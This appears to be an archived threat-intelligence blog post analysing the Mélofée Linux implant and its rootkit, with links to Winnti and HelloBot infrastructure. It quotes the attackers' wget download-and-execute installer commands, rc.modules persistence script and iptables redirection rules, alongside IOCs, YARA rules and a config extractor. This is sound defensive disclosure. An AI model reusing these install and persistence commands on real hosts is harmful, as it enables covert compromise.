{ "id": "3ccdcd57-7104-4d03-b0f5-720c026aab70", "created_at": "2026-04-06T00:13:11.053596Z", "updated_at": "2026-04-10T13:12:48.736363Z", "deleted_at": null, "sha1_hash": "fde68c48764877cbd2d667deaa47f7d00e42a691", "title": "Mélofée: a new alien malware in the Panda's toolset targeting Linux hosts", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2813453, "plain_text": "Mélofée: a new alien malware in the Panda's toolset targeting\r\nLinux hosts\r\nPublished: 2023-03-28 · Archived: 2026-04-05 21:37:01 UTC\r\nWe recently discovered an novel undetected implant family targeting Linux servers, which we dubbed Mélofée.\r\nWe linked with high confidence this malware to chinese state sponsored APT groups, in particular the notorious\r\nWinnti group.\r\nIn this blogpost we will first analyze the capabilities offered by this malware family, which include a kernel mode\r\nrootkit, and then deep dive in an infrastructure pivot maze to discover related adversary toolsets.\r\nMélofée implant analysis\r\nhttps://blog.exatrack.com/melofee/\r\nPage 1 of 19\n\nWe found three samples of this malware family, which we dubbed Mélofée.\r\nTwo of these samples included a version number ( 20220111 , 20220308 ), and we assess that the last sample was\r\nlikely dated from late April or May 2022.\r\nAll these samples shared a common code base, but showed a constant development in the following domains:\r\nevolutions of the communication protocol and the packet format\r\nchange in the encryption of the configuration, using first RC4 and then a simple xor\r\nthe development of a SelfForwardServer functionality\r\nlastly, the inclusion of a kernel mode rootkit in the last sample.\r\nRootkit\r\nThe first sample we found dropped a rootkit based on a modified version of the open source projet Reptile\r\n1\r\n.\r\nAccording to the vermagic metadata, it is compiled for a kernel version 5.10.112-108.499.amzn2.x86_64 . The\r\nrootkit has a limited set of features, mainly installing a hook designed for hiding itself.\r\nThe rootkit hooks the functions fillonedir , filldir and filldir64 in order to not display files with names\r\ncontaining intel_audio or rc.modules when listing a directory.\r\nIt also hooks the inet_ioctl function in order to be able to communicate with its userland part using the ioctl\r\nsystem call. The kernel rootkit expects the userland component to send a value of 0xe0e0e0e during the IOCTL\r\ncall, with 2 commands supported (these two commands being hide and show ).\r\nThe rootkit is loaded both by the installer and server components with a call to the insmod utility.\r\nInstaller\r\nThe implant and the rootkit were installed using shell commands downloading both the installer and a custom\r\nbinary package from an adversary controlled server. This behaviour is similar to the installation process of Winnti\r\nLinux rootkits.\r\nwget http://173.209.62[.]186:8765/installer -O /var/tmp/installer\r\nwget http://173.209.62[.]186:8765/a.dat -O /var/tmp/usbd;\r\nchmod +x /var/tmp/installer;\r\n/var/tmp/installer -i /var/tmp/usbd\r\nThe installer is also developped in C++ , and takes the binary package as an argument. It then then proceeds to\r\nextract and install both the rootkit and the server component. The rootkit and implant paths are hardcoded to\r\nrespectively /etc/intel_audio/intel_audio.ko and /etc/intel_audio/audio The installer inserts the kernel\r\nrootkit using a call to system(\"insmod /etc/intel_audio/intel_audio.ko\") , and also install the persistance in\r\nthe /etc/rc.modules file.\r\nWriting to this script ensures that both kernel and implant are executed at boot time2.\r\nhttps://blog.exatrack.com/melofee/\r\nPage 2 of 19\n\nThe resulting script after installation can be seen below:\r\n#!/bin/sh\r\n#Script for starting modules\r\n/sbin/insmod /etc/intel_audio/intel_audio.ko\r\n/etc/intel_audio/audio\r\n#End script\r\nThe first bytes of the package includes the offset to the payload (in little endian), which is used to correctly extract\r\nthe kernel rootkit and the server implant.\r\n00000000: b07e 0000 a841 3000 7f45 4c46 0201 0100 .~...A0..ELF....\r\n00000010: 0000 0000 0000 0000 0100 3e00 0100 0000 ..........\u003e.....\r\n00000020: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\nThe developper was also kind enough to includes an usage function describing the installer’s options:\r\nvoid usage(undefined8 param_1)\r\n{\r\n printf(\"Usage: \u003c%s\u003e [options]\\n\",param_1);\r\n puts(\" -r Remove\");\r\n puts(\" -i \u003cdata file\u003e Install\");\r\n puts(\" -d Run in background\");\r\n puts(\" -h Show help\");\r\n return;\r\n}\r\nConfiguration management\r\nThe configuration is encrypted using the RC4 algorithm in the two early samples, and with a simple xor with a\r\nsingle byte key ( 0x43 ) in the undated sample.\r\nThe configuration format has changed between the samples, the first one containing all elements in encrypted\r\nform, and the last one with only the C\u0026C domain encrypted.\r\nExample of decrypted configuration:\r\n1:www.data-yuzefuji[.]com:443:5\r\nThis configuration contains the following elements:\r\nThe socket type ( 0x1 being TCP )\r\nThe C\u0026C domain\r\nThe communication port\r\nhttps://blog.exatrack.com/melofee/\r\nPage 3 of 19\n\nThe sleeptime in minutes between requests\r\nPersistance mechanisms\r\nThe implant has two mechanisms of persistance, depending on its running privileges. If it runs as the root user,\r\nit tries to write a line containing sh -c IMPLANT_EXECUTABLE_NAME \u003e/dev/null 2\u003e\u0026 in the files /etc/rc.local\r\nor /etc/rc.d/rc.local .\r\nIf it runs as a simple user, it will try to install its persistance in the following files:\r\n/home/CURRENT_USERNAME/.bash_profile\r\n/home/CURRENT_USERNAME/.bash_login\r\n/home/CURRENT_USERNAME/.profile\r\nThe rootkit installer will insert the persistance for the kernel module in the /etc/rc.modules file.\r\nSupported commands\r\nThe commands supported by the implant have evolved between the samples, showing current development of the\r\nbackdoor.\r\nThe first two versions:\r\nCommand ID Capability Comment\r\n0x103 ping_back Sent by the client\r\n0x1 uninstall Kill the current process and removes the persistance\r\n0x2 update_and_relaunch Overwrite the current running file and relaunch\r\n0x3 launch_new_command_thread Creates a new socket for interaction\r\n0x4 write_file\r\n0x5 read_file\r\n0x6 launch_shell\r\n0x7 create_socket 0x0 : TCP, 0x1 : TLS, 0x2 : UDP\r\n0x10 send_local_information Hostname, date, current UID, implant version number, …\r\n0x50001 list_directory\r\n0x50002 create_directory\r\n0x50003 not_implemented\r\n0x50004 delete_directory Wrapper over system(\"rm -fr %s)\r\nhttps://blog.exatrack.com/melofee/\r\nPage 4 of 19\n\nLast version:\r\nCommand ID Capability Comment\r\n0x10005 reset_timer\r\n0x10002 clean_and_exit\r\n0x10004 create_socket Create a bidirectional socket, probably used for proxying\r\n0x40001 list_directory\r\n0x40002 delete_directory Wrapper over system(\"rm -fr %s)\r\n0x40003 rename\r\n0x40004 create_directory\r\n0x40005 write_file\r\n0x40006 read_file\r\n0x50001 exec_command_with_output\r\n0x70001 write_integer_to_file Purpose unknown, probably used for sleeptime\r\n0x60001 launch_shell\r\n0x90001 no_op\r\nCommunication protocols\r\nThe communication protocols have evolved in the three analyzed samples, however three socket types are\r\nimplemented:\r\nTCPSocket (type 0x0 ) using raw TCP, with a custom packet format described below;\r\nTLSSocket (type 0x1 ), using a TLS encrypted channel to exchange with the C\u0026C server;\r\nUDPSocket (type 0x2 ), using the KCP protocol 3\r\n to send data. It should be noted that the KCP protocol\r\nis a public communication library, and is also used in several malware families such as Amoeba\r\n4\r\n or\r\nCrossWalk\r\n5\r\n;\r\nSome leftover code seems to indicate that there could be a third type 0x3 for HTTP based\r\ncommunications, but it was not implemented in the analyzed samples.\r\nWhile the data is not encrypted in any form in two of the samples, in the last one it is encrypted using the RC4\r\nalgorithm with a hardcoded key ( \\x01\\x02\\x03\\x04 repeated 4 times).\r\nThe packet formats used by Mélofée are the following:\r\nhttps://blog.exatrack.com/melofee/\r\nPage 5 of 19\n\nstruct Packet202201_3 {\r\n unsigned int dwCommand;\r\n unsigned int dwCommandResult;\r\n unsigned int dwUnknown;\r\n unsigned int dwDataSize;\r\n char [] clear_text_data;\r\n}\r\nstruct Packet202205 {\r\n unsigned int dwUnknown;\r\n unsigned int dwRandom1;\r\n unsigned int dwRandom2;\r\n unsigned int dwCommandResult;\r\n unsigned int dwCommandID;\r\n unsigned int dwCommandSize;\r\n char [] encrypted_data;\r\n}\r\nSelfForwardServer and listening server\r\nIn the latest sample, a new functionality was implemented, named SelfForwardServer .\r\nDepending on a configuration flag, the implant can install iptables rules to redirect TCP network traffic from\r\nport 57590\r\nThe steps to install these rules are the following:\r\nFirst a new NAT chain named is created XFILTER using the following command: iptables -t nat -N\r\n%s\r\nA redirection rule is added for the port in this NAT chain: iptables -t nat -A %s -p tcp -j REDIRECT --\r\nto-port %d\r\nSave the recent connections from port 45535 with the name ipxles : iptables -t nat -A PREROUTING -p\r\ntcp --sport 45535 -m recent --set --name %s --rsource -j ACCEPT\r\nRedirects recent ipxles connections to the NAT chain: iptables -t nat -A PREROUTING -p tcp --dport\r\n%d --syn -m recent --rcheck --seconds 300 --name %s --rsource -j %s\r\nFinally, the host is instructed to accept network traffic on the port 57590 using the command iptables -\r\nI INPUT -p tcp --dport %d -j ACCEPT\r\nIt should be noted that while the SelfForwardServer was deactivated in the configuration, the sample embedded\r\nboth a self-signed certificate generated on 2021-06-03 and the corresponding private key to be used for securing\r\ncommunication in Server mode.\r\nSome of the underlying code is also present in the two earlier samples (as documented by leftover RTTI\r\ninformation), and three types of server were available:\r\nTCPServer (type 0x00 )\r\nhttps://blog.exatrack.com/melofee/\r\nPage 6 of 19\n\nTLServer (type 0x1 )\r\nUDPServer (type 0x2 )\r\nOne interesting tidbit of this code is hidden in the receive function of the TLSServer (at address 0x429b7a in\r\nthe undated sample). When the 4 first bytes received by this function using the recv library call are 03 01 d3\r\n76 , a flag affecting the creation of the subsequent socket is set. However, we could not identify precisely the\r\npurpose of this magic.\r\nBecause of the presence of unused code, and the evolutions between the samples, we assess that the Server and\r\nSelfForwardServer are currently under development by the attackers.\r\nAnother pokemon inside the attacker’s toolset\r\nWe analyzed the infrastructure used by the attacker using pivot on both public and private datasets. We assess that\r\nthis malware family is probably linked to the Amoeba ant Winnti\r\n4\r\n \r\n6\r\n \r\n7\r\n \r\n8\r\n state sponsored threat groups.\r\nThe infrastructure for the Mélofée implants are linked to the following tools:\r\nSome of the servers were tracked by our Cyber Threat Intelligence as ShadowPad C\u0026C servers;\r\nOther servers were linked to both Winnti and HelloBot tools;\r\nWe also saw related domains used as C\u0026C servers for tools like PlugX, Spark9, Cobalt Strike, StowAway\r\n10\r\n, and the legitimate toDesk remote control tool;\r\nLastly, the attacker also probably used the ezXSS\r\n11\r\n tool, but we could not confirm why.\r\nHellobot\r\nHelloBot is a malware family also targeting Linux hosts and is known to be used by APT groups such as Earth\r\nBerberoka\r\n6\r\n. While pivoting on the Mélofée infrastructure, we found a common IP with an HelloBot sample,\r\nwhich provided another point to dig in.\r\nWe found several samples of this malware and developped a custom configuration extraction script (provided in\r\nthe annexes of this blog post).\r\nUsing the configurations extracted, we also were able to find strong infrastructure links between HelloBot and\r\nWinnti, for example both used a subdomain of git1ab[.]com and cloudf1are[.]com as C\u0026C servers.\r\nProbable links with Winnti\r\nThe response issued by the C\u0026C server at the IP address 173.209.62.186 on the port 443 could be uniquely\r\nlinked to another domain dev.yuanta.dev . This server was known to be used to stage archives containing an\r\ninstaller for the Linux version of the Winnti rootkit 7.\r\nWe also downloaded several samples of this malware family, extracted the configuration (using the script provided\r\nby Chronicle), and found several common domains between HelloBot and Winnti, such as cloudf1are[.]com\r\nand git1ab[.com .\r\nhttps://blog.exatrack.com/melofee/\r\nPage 7 of 19\n\nAnalysis graph\r\nUsing the previous datapoints, we generated an infrastructure graph to draw the relations between the samples.\r\nWe assess with high confidence that HelloBot, Winnti and Mélofée are all related and were used by Chinese state\r\nsponsored attacker groups during at least all of 2022.\r\nAlien\r\nDuring our analysis, we discovered another Linux implant dubbed AlienReverse.\r\nThis code was architectured in a similar manner as Mélofée, however there are several crucial differences:\r\nThe data of the communication protocol was encrypted using pel_decrypt and pel_encrypt from the\r\nReptile project 1\r\n.\r\nThe command IDs were different, as can be seen below\r\nThe tool included several other public tools, such as EarthWorm\r\n12\r\n and socks_proxy\r\n13\r\n.\r\nThere were however some common points between Mélofée and AlienReverse\r\nBoth implants were developped in C++\r\nBoth implants used a file with a fixed ID in /var/tmp/%s.lock to ensure only one implant is running (this\r\ncode was found in public 14, but seems rarely used in the wild)\r\nThis implant implemented a similar mechanism for limiting working hours (defined as worktime )\r\nThe command supported by this implant were the following:\r\nCommand\r\nID\r\nCapability Comment\r\n0x110010 CmdBroadcast Send encrypted data over the socket\r\n0x110011 CmdOnRainUninstall Unimplemented\r\nhttps://blog.exatrack.com/melofee/\r\nPage 8 of 19\n\nCommand\r\nID\r\nCapability Comment\r\n0x110020 CmdOnline\r\nSend local information such as hostname, date, and current UID to\r\nthe server\r\n0x110061 FileManager\r\nSupports several subcommands such as OpenFile , CreateDir ,\r\nFileEnum , FileDownload , …\r\n0x110062 ScreenSnapshot Unimplemented\r\n0x110063 CmdOnTaskList Unimplemented\r\n0x110064 CmdOnShellCommand Launch interactive shell\r\n0x110065 CmdOnShellActive Unimplemented\r\n0x110066 CmdOnServiceList Unimplemented\r\n0x110068 CmdOnPortMapping\r\nLaunches EarthWorm to perform the port mapping, supporting a\r\nscanning mode with another AlienReverse implant used as a\r\nproxy. Also implements the management of a Socks proxy\r\n0x110073 CmdOnKbdRecord Unimplemented\r\n0x110075 CmdOnWorkTime Writes the expected runtime hours in the file /tmp/worktime\r\nThe packet format used by the communication protocol is very similar to the one used by Mélofée:\r\nstruct AlienComzPacket {\r\n unsigned int dwTickCount;\r\n unsigned int dwMagic1; // 0xa003001\r\n unsigned int dwMagic2; // 0x10000137, also used to indicate if the packet has data\r\n unsigned int dwCommandID;\r\n unsigned int dwTotalSize;\r\n unsigned int dwEncryptedSize;\r\n unsigned int ;\r\n char [] data; // The data encrypted using pel_encrypt\r\n}\r\nWhile we initially thought that this sample was related to the Mélofée family, we came to the conclusion that it is a\r\ndistinct tool. However, we decided to include it in this report because it was used as a starting point in this\r\ninvestigation, and we think that sharing it to the public is important.\r\nWe also could not link it to known adversary groups, but we assess that it is likely used in targeted attacks.\r\nConclusion\r\nhttps://blog.exatrack.com/melofee/\r\nPage 9 of 19\n\nThe Mélofée implant family is another tool in the arsenal of chinese state sponsored attackers, which show\r\nconstant innovation and development.\r\nThe capabilities offered by Mélofée are relatively simple, but may enable adversaries to conduct their attacks\r\nunder the radar. These implants were not widely seen, showing that the attacker are likely limiting its usage to\r\nhigh value targets.\r\nAnnexes\r\nIOCs\r\nHashes\r\nSHA256 FileType Comment\r\n3ca39774a4405537674673227940e306cf5e8cd8dfa1f5fc626869738a489c3d Text file\r\nInstallation\r\ncommands\r\n758b0934b7adddb794951d15a6ddcace1fa523e814aa40b55e2d071cf2df81f0\r\nELF x64\r\nexecutable\r\nInstaller\r\na5a4284f87fd475b9474626040d289ffabba1066fae6c37bd7de9dabaf65e87a\r\nELF x64\r\nexecutable\r\nImplant version\r\n20220111\r\n2db4adf44b446cdd1989cbc139e67c068716fb76a460654791eef7a959627009\r\nELF x64\r\nexecutable\r\nImplant version\r\n20220308\r\n8d855c28744dd6a9c0668ad9659baf06e5e448353f54d2f99beddd21b41390b7\r\nELF x64\r\nexecutable\r\nImplant with\r\nrootkit and\r\nwithout version\r\nnumber\r\nf3e35850ce20dfc731a6544b2194de3f35101ca51de4764b8629a692972bef68\r\nBinary\r\nfile\r\nContainer of\r\nrootkit and\r\nimplant probably\r\nused for\r\ninstallation\r\n330a61fa666001be55db9e6f286e29cce4af7f79c6ae267975c19605a2146a21\r\nPE x64\r\nexecutable\r\nCobalt Strike\r\nbeacon\r\n7149cdb130e1a52862168856eae01791cc3d9632287f990d90da0cce1dc7c6b9\r\nPE32\r\nexecutable\r\nCobalt Strike\r\nbeacon\r\na62b67596640a3ebadd288e733f933ff581cc1822d6871351d82bd7472655bb5\r\nELF x64\r\nexecutable\r\nStowAway proxy\r\ntool\r\nhttps://blog.exatrack.com/melofee/\r\nPage 10 of 19\n\nSHA256 FileType Comment\r\n3535f45bbfafda863665c41d97d894c39277dfd9af1079581d28015f76669b88\r\nELF x64\r\nexecutable\r\nAlienReverse\r\nimplant\r\n2e62d6c47c00458da9338c990b095594eceb3994bf96812c329f8326041208e8\r\nELF x32\r\nexecutable\r\nHelloBot implant\r\n407ab8618fed74fdb5fd374f3ed4a2fd9e8ea85631be2787e2ad17200f0462b8\r\nELF x32\r\nexecutable\r\nHelloBot implant\r\n187b6a4c6bc379c183657d8eafc225da53ab8f78ac192704b713cc202cf89a17\r\nELF x32\r\nexecutable\r\nHelloBot implant\r\n2801a3cc5aed8ecb391a9638a3c6f8db58ca3002e66f11bf88f8c7c2e5a6b009\r\nELF x32\r\nexecutable\r\nHelloBot implant\r\n6e858c2c9ae20e3149cb0012ab9a24995aa331d2a818b127b2f517bc3aa745a0\r\nPE x64\r\nexecutable\r\nGo downloader\r\nfor toDesk\r\n7684e1dfaeb2e7c8fd1c9bd65041b705bc92a87d9e11e327309f6c21b5e7ad97\r\nPE x64\r\nexecutable\r\nGo downloader\r\nfor toDesk\r\n899ef7681982941b233e1ea3c1a6d5a4e90153bbb2809f70ee5f6fcece06cabc\r\nPE x64\r\nexecutable\r\nSpark implant\r\nc36ab5108491f4969512f4d35e0d42b3d371033c8ccf03e700c60fb98d5a95f8 ELF x64\r\nUPX Packed\r\nexecutable\r\n(probably NPS, to\r\nconfirm)\r\nad5bc6c4e653f88c451f6f6375516cc36a8fa03dd5a4d1412a418c91d4f9bec8\r\nASCII\r\ntext file\r\nScript dropped in\r\n/etc/rc.modules\r\nfor rootkit\r\npersistance\r\n1f9e4bfb25622eab6c33da7da9be6c51cf8bf1a284ee1c1703a3cee445bc8cd9\r\nELF x64\r\nexecutable\r\nWinnti Linux\r\n22fd67457274635db7dd679782e002009363010db66523973b4748d5778b1a2a\r\nELF x64\r\nexecutable\r\nWinnti Linux\r\n3c1842d29a3445bd3b85be486e49dba36b8b5ad55841c0ce00630cb83386881d\r\nELF x64\r\nexecutable\r\nWinnti Linux\r\n5861584bb7fa46373c1b1f83b1e066a3d82e9c10ce87539ee1633ef0f567e743\r\nELF x64\r\nexecutable\r\nWinnti Linux\r\nrootkit\r\nhttps://blog.exatrack.com/melofee/\r\nPage 11 of 19\n\nSHA256 FileType Comment\r\n378acfdbcec039cfe7287faac184adf6ad525b201cf781db9082b784c9c75c99\r\nShell\r\nscript\r\nWinnti Linux\r\nrootkit installer\r\n617f9add4c27f3bb91a32fee007cce01f5a51deaf42e75e6cec3e71afe2ba967\r\nELF x64\r\nexecutable\r\nWinnti Linux\r\n69ff2f88c1f9007b80d591e9655cc61eaa4709ccd8b3aa6ec15e3aa46b9098bd\r\nELF x64\r\nexecutable\r\nWinnti Linux\r\nad979716afbce85776251d51716aeb00665118fb350038d150c129256dd6fc5f\r\nELF x64\r\nexecutable\r\nWinnti Linux\r\nf49f1b2cc52623624fdd3d636056b8a80705f6456a3d5a676e3fb78749bdd281\r\nELF x64\r\nexecutable\r\nWinnti Linux\r\n2c1a6fe08c8cbdc904809be4c12b520888da7f33123d1656a268780a9be45e20\r\nELF x64\r\nexecutable\r\nWinnti Linux\r\nrootkit (Azazel\r\nfork)\r\na37661830859ca440d777af0bfa829b01d276bb1f81fe14b1485fa3c09f5f286\r\nJavaScript\r\nfile\r\nezXSS payload\r\nFilenames\r\n/etc/intel_audio\r\n/etc/intel_audio/id\r\n/etc/intel_audio/intel_audio.ko\r\nNetwork IOCs\r\nIOC Comment\r\ndgbyem[.]com AlienReverse C\u0026C domain\r\nupdate[.]ankining[.]com Mélofée C\u0026C subdomain\r\nwww.data-yuzefuji.com Mélofée C\u0026C domain\r\nssm[.]awszonwork[.]com Mélofée C\u0026C subdomain\r\nstock[.]awszonwork[.]com CobaltStrike C\u0026C subdomain\r\nhelp[.]git1ab[.]com HelloBot C\u0026C subdomain\r\nabout[.]git1ab[.]com StowAway and Winnti C\u0026C subdomain\r\nhttps://blog.exatrack.com/melofee/\r\nPage 12 of 19\n\nIOC Comment\r\nwww[.]git1ab[.]com Unknown usage\r\ncloudf1are[.]com CobaltStrike C\u0026C domain, PlugX staging\r\ncdn[.]cloudf1are[.]com HelloBot C\u0026C subdomain\r\ncdn2[.]cloudf1are[.]com C\u0026C subdomain\r\ncdn3[.]cloudf1are[.]com C\u0026C subdomain\r\ncdn4[.]cloudf1are[.]com C\u0026C subdomain\r\ndns[.]cloudf1are[.]com PlugX and Winnti C\u0026C subdomain\r\ndns2[.]cloudf1are[.]com Spark C\u0026C subdomain, ToDesk staging\r\ndev[.]yuanta[.]dev Probable Winnti C\u0026C domain\r\ntest[.]yuanta[.]dev Probable Winnti C\u0026C domain\r\nus.securitycloud-symantec[.]icu\r\nWinnti C\u0026C domain\r\nvt.livehost[.]live Winnti C\u0026C domain\r\n156.67.208[.]192 Mélofée C\u0026C IP\r\n5.61.57[.]80 Mélofée C\u0026C IP\r\n147.139.28[.]254 AlienReverse C\u0026C IP\r\n173.209.62[.]186 Mélofée installer staging\r\n173.209.62[.]187 C\u0026C server\r\n173.209.62[.]188 Mélofée C\u0026C server and Winnti staging domain\r\n173.209.62[.]189 C\u0026C server\r\n173.209.62[.]190 Mélofée C\u0026C IP\r\n167.172.73[.]202\r\nCobaltStrike, * // The data encrypted using pel_encryptShadowPad and\r\nHelloBot C\u0026C IP\r\n47.243.51[.]98 StowAway C\u0026C IP\r\n185.145.128[.]90 CobaltStrike and PlugX C\u0026C IP\r\n103.87.10[.]100 toDesk staging\r\nhttps://blog.exatrack.com/melofee/\r\nPage 13 of 19\n\nIOC Comment\r\n202.182.101[.]174 PlugX C\u0026C IP\r\n144.202.112[.]187 PlugX staging\r\n38.54.30[.]39 Winnti C\u0026C IP\r\nYara rules\r\nrule UNK_APT_MelofeeImplant {\r\n meta:\r\n author = \"Exatrack\"\r\n date = \"2023-03-03\"\r\n update = \"2023-03-03\"\r\n description = \"Detects the Melofee implant\"\r\n tlp = \"CLEAR\"\r\n sample_hash = \"a5a4284f87fd475b9474626040d289ffabba1066fae6c37bd7de9dabaf65e87a,f3e35850ce20dfc731a6544b\r\n strings:\r\n $str_melofee_implant_01 = \"10PipeSocket\"\r\n $str_melofee_implant_02 = \"ikcp_ack_push\"\r\n $str_melofee_implant_03 = \"TLSSocketEE\"\r\n $str_melofee_implant_04 = \"/tmp/%s.lock\"\r\n $str_melofee_implant_05 = \"neosmart::WaitForMultipleEvents\"\r\n $str_melofee_implant_06 = \"9TLSSocket\"\r\n $str_melofee_implant_07 = \"7VServer\"\r\n $str_melofee_implant_08 = \"N5boost6detail13sp_ms_deleterI13UdpSocketWrapEE\"\r\n $str_melofee_implant_09 = \"UdpServerWrap\"\r\n $str_melofee_implant_10 = \"KcpUpdater\"\r\n $str_melofee_implant_11 = \"SelfForwardServer\"\r\n $str_command_parsing_01 = {3? 01 00 05 00 ?? ?? ?? ?? 00 00 3? 01 00 05 00 ?? ?? 3? 05 00 04 00}\r\n $str_command_parsing_02 = {3? 04 00 04 00 ?? ?? ?? ?? 00 00 3? 04 00 04 00 ?? ?? 3? 05 00 01 00}\r\n $str_command_parsing_03 = {3? 01 00 07 00 ?? ?? ?? ?? 00 00 3? 01 00 09 00 ?? ?? ?? ?? ?? 00 3? 01 00 06\r\n condition:\r\n 3 of them\r\n}\r\nrule UNK_APT_Melofee_Installer {\r\n meta:\r\n author = \"Exatrack\"\r\n date = \"2023-03-15\"\r\n update = \"2023-03-15\"\r\nhttps://blog.exatrack.com/melofee/\r\nPage 14 of 19\n\ndescription = \"Detects the installer for melofee malware\"\r\n score = 80\r\n tlp = \"AMBER\"\r\n source = \"Exatrack\"\r\n sample_hash = \"758b0934b7adddb794951d15a6ddcace1fa523e814aa40b55e2d071cf2df81f0\"\r\n strings:\r\n $str_melofee_installer_01 = \"#Script for starting modules\"\r\n $str_melofee_installer_02 = \"#End script\"\r\n $str_melofee_installer_03 = \"/etc/intel_audio/\"\r\n $str_melofee_installer_04 = \"rm -fr /etc/rc.modules\"\r\n $str_melofee_installer_05 = \"-i \u003cdata file\u003e Install\"\r\n $str_melofee_installer_06 = \"cteate home folder failed\"\r\n $str_melofee_installer_07 = \"create rootkit file failed\"\r\n $str_melofee_installer_08 = \"create auto start file failed\"\r\n $str_melofee_installer_09 = \"Remove Done!\" // only 3 files on VT with this :D\r\n $str_melofee_installer_10 = \"Unkown option %c\\n\"\r\n condition:\r\n any of them\r\n}\r\nrule UNK_APT_Alien_Implant {\r\n meta:\r\n author = \"Exatrack\"\r\n date = \"2023-03-03\"\r\n update = \"2023-03-03\"\r\n description = \"Detects an unknown implant from AlienManager family, maybe related to melofee\"\r\n tlp = \"CLEAR\"\r\n sample_hash = \"3535f45bbfafda863665c41d97d894c39277dfd9af1079581d28015f76669b88,\"\r\n strings:\r\n $str_alien_01 = \"[+] Connect %s Successed,Start Transfer...\"\r\n $str_alien_02 = \"Alloc buffer to decrypt data error, length == %d.\"\r\n $str_alien_03 = \"pel_decrypt_msg data error, error\"\r\n $str_alien_04 = \"encrypt data error, length == %d.\"\r\n $str_alien_05 = \"DoRecvOverlapInternal error!\"\r\n $str_alien_06 = \"Socks Listen port is %d,Username is %s, password is %s\"\r\n $str_alien_07 = \"Start port mapping error! remoteAddr=%s remotePort=%d localAddr=%s localPort=%d\"\r\n $str_alien_08 = \"OnCmdSocksStart error!\"\r\n $str_alien_09 = \"The master isn't readable!\"\r\n $str_alien_10 = \"ConnectBypassSocks proxy:%s:%d error!\"\r\n $str_alien_11 = \"ConnectBypassSocks to %s %d\"\r\n $str_alien_12 = \"now datetime: %d-%d-%d %d:%d:%d\"\r\n $str_alien_13 = \"Not during working hours! Disconnect!\"\r\n $str_alien_14 = \"Example: ./AlienReverse --reverse-address=192.168.1.101:80 --reverse-password=123456\"\r\nhttps://blog.exatrack.com/melofee/\r\nPage 15 of 19\n\n$str_alien_15 = \"Not during working hours! Disconnect!\"\r\n $str_alien_16 = \"SocksManager.cpp\"\r\n $str_alien_17 = \"connect() in app_connect\"\r\n $str_alien_18 = \"They send us %hhX %hhX\"\r\n $str_alien_19 = \"your input directory is not exist!\"\r\n $str_alien_20 = \"Send data to local error ==\u003e %d.\\n\"\r\n condition:\r\n any of them\r\n}\r\nATT\u0026CK Techniques used\r\nT1583.001 - Attackers acquired servers for staging and command \u0026 control\r\nT5183.004 - Attackers acquired domains\r\nT1071.001 - Attacker uses application layer protocols as C2\r\nT1587.001 - Adversary develop custom malware to achieve its attacks\r\nT1037.004 - Adversary uses RC scripts as persistance\r\nT1059.004 - Attacker uses Unix shell commands and scripts\r\nT1132.002 - Non standard encoding using KCP\r\nT1573.001 - Attacker uses RC4 to encrypt its C2 traffic\r\nT1083 - File and directory discovery\r\nT1592.002 - Attacker discovers the installed version of the Linux distribution\r\nT1564.001 - Adversary hides the files using a rootkit\r\nT1562.003 - Adversary disables the shell history when executing a command\r\nT1070.004 - Adversary can remove the implant, the rootkit and its configuratin from the system\r\nT1599.001 - Adversary can modify thze firewall rules of the compromised host\r\nT1095 - Adversary can use UDP as a communication layer\r\nT1571 - Adversary can use alternative ports for communication\r\nT1027.002 - HelloBot implants are packed using UPX with the configuration appended\r\nT1027.007 - Adversary payloads are stripped\r\nT1588.001 - Adversary may buy or download malware\r\nT1588.002 - Adversary may buy or download tools such as Cobalt Strike\r\nT1057 - Adversary may list the processes executing on the compromised host\r\nT1572 - Adversary may tunnel network communications\r\nT1090 - Adversary may use a connection proxy for accessing internal ressources\r\nT1014 - Adversary uses a rootkit\r\nT1608.001 - Adversary uploads its malware on its infrastructure for deploying\r\nT1608.002 - Adversary uploads its tools on its infrastructure\r\nT1082 - Adversary gets detailed information about the compromised host such as the operating system\r\nversion\r\nT1497.003 - Adversary uses time-based methods to avoid detection\r\nhttps://blog.exatrack.com/melofee/\r\nPage 16 of 19\n\n#!/usr/bin/env python3\r\n# encoding: utf-8\r\n\"\"\"\r\n Hello Bot configuration extractor\r\n (c) 2023 Exatrack\r\n\"\"\"\r\nimport sys\r\nimport argparse\r\nimport struct\r\ndef decrypt_config(config):\r\n \"\"\"\r\n Decrypts hellobot configuration\r\n \"\"\"\r\n old_char = 0\r\n out = []\r\n key = b'ecfafeab6ee7d642'\r\n for index, car in enumerate(config):\r\n bVar1 = old_char ^ key[index%len(key)]\r\n dec_car = bVar1 ^ car\r\n old_char = car\r\n out.append(dec_car)\r\n return bytes(bytearray(out))\r\ndef get_config(data):\r\n \"\"\"\r\n Extract the pointer to the configuration\r\n \"\"\"\r\n offset = struct.unpack('I', data[-4:])[0]\r\n if offset \u003e len(data)-4:\r\n print(\"[!] Error, cannot find offset, probably not a packed Hellobot sample\")\r\n raise IOError\r\n config = data[-offset-4:-4]\r\n if b'[main]' in config:\r\n print(\"[x] Success, found hellobot configuration\")\r\n return -offset-4, config\r\ndef extract_hellobot(fname):\r\n packed_data = open(fname, 'rb').read()\r\n offset, config = get_config(packed_data)\r\nhttps://blog.exatrack.com/melofee/\r\nPage 17 of 19\n\nto_unpack = packed_data[:offset]\r\n with open(f\"{fname}_config\", \"wb\") as of:\r\n of.write(config)\r\n with open(f\"{fname}_config_decrypted\", \"wb\") as of:\r\n of.write(decrypt_config(config))\r\n with open(f\"{fname}_packed\", \"wb\") as of:\r\n of.write(to_unpack)\r\ndef main():\r\n parser = argparse.ArgumentParser(description=sys.modules[__name__].__doc__)\r\n parser.add_argument(\"filename\", help=\"The filename of the sample to unpack\")\r\n args = parser.parse_args()\r\n extract_hellobot(args.filename)\r\nif __name__ == \"__main__\":\r\n main()\r\n1. https://github.com/f0rb1dd3n/Reptile ↩︎ ↩︎\r\n2. https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/5/html/deployment_guide/s1-\r\nkernel-modules-persistant ↩︎\r\n3. https://github.com/skywind3000/kcp ↩︎\r\n4. https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf ↩︎ ↩︎\r\n5. https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/ ↩︎\r\n6. https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf ↩︎ 